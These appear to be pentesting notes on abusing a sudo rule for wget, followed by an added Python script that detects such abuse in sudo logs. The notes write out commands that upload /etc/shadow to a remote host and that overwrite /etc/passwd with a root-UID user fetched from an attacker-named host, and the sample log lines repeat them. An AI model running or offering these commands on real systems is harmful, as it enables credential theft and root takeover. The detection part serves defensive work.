- Applies when a sudo rule lets you run wget as root
- Can use wget to exfiltrate sensitive files
- Can also download exploits, scripts, etc.
    sudo wget --post-file=/etc/shadow remoteIP:remotePort
    wget https://filetodownload
- You could also overwrite /etc/passwd or /etc/shadow to include your own user
    openssl passwd -1 -salt username password
- Copy the /etc/passwd file and add a malicious user with the root UID (0)
    user:passwdhash:0:0:root:/root:/bin/bash
- Host the new file, then use wget to download it over the original
    sudo wget -O /etc/passwd http://malicous/passwd
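
For detection, an added example (not part of the original notes): a Python check that reads sudo log lines in the default syslog layout and flags wget runs that upload or overwrite the files named above. The watch list, function names and sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
import shlex

# Assumed watch list: files whose upload or overwrite by a root-run wget is an alert.
SENSITIVE = {"/etc/passwd", "/etc/shadow", "/etc/sudoers"}
# Default sudo syslog layout: "sudo: <user> : TTY=.. ; PWD=.. ; USER=.. ; COMMAND=.."
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?PWD=(?P<pwd>.*?) ; USER=\S+ ; COMMAND=(?P<cmd>.+)$")
# wget options that send a local file (uploads) or choose the output file (overwrites).
OPTIONS = {"--post-file": "uploads", "--body-file": "uploads",
           "-O": "overwrites", "--output-document": "overwrites"}

def option_values(argv):
    """Yield (action, value) for '--opt=val', '--opt val', '-O val' and '-Oval'."""
    for i, arg in enumerate(argv):
        for name, action in OPTIONS.items():
            if arg == name:
                if i + 1 < len(argv):
                    yield action, argv[i + 1]
            elif name.startswith("--") and arg.startswith(name + "="):
                yield action, arg[len(name) + 1:]
            elif name == "-O" and arg.startswith("-O"):
                yield action, arg[2:]

def flag_sudo_wget(line):
    """Return (user, action, absolute_path) findings for one sudo log line."""
    m = SUDO_RE.search(line)
    if not m:
        return []
    try:
        argv = shlex.split(m.group("cmd"))
    except ValueError:  # unbalanced quotes in the logged command
        argv = m.group("cmd").split()
    if not argv or posixpath.basename(argv[0]) != "wget":
        return []
    findings = []
    for action, value in option_values(argv[1:]):
        # Resolve relative paths and "../" against the logged working directory.
        path = posixpath.normpath(posixpath.join(m.group("pwd"), value))
        if path in SENSITIVE:
            findings.append((m.group("user"), action, path))
    return findings

# Constructed log lines (documentation IP ranges), not taken from the page.
SAMPLE = [
    "Jan 10 12:00:01 web1 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/wget --post-file=/etc/shadow 192.0.2.10:8080",
    "Jan 10 12:03:44 web1 sudo:    alice : TTY=pts/0 ; PWD=/etc ; USER=root ; COMMAND=/usr/bin/wget -O passwd http://198.51.100.7/passwd",
    "Jan 10 12:09:02 web1 sudo:      bob : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/wget -O /tmp/pkg.deb https://example.org/pkg.deb",
]
```

Combined short flags such as -qO are not parsed by this check.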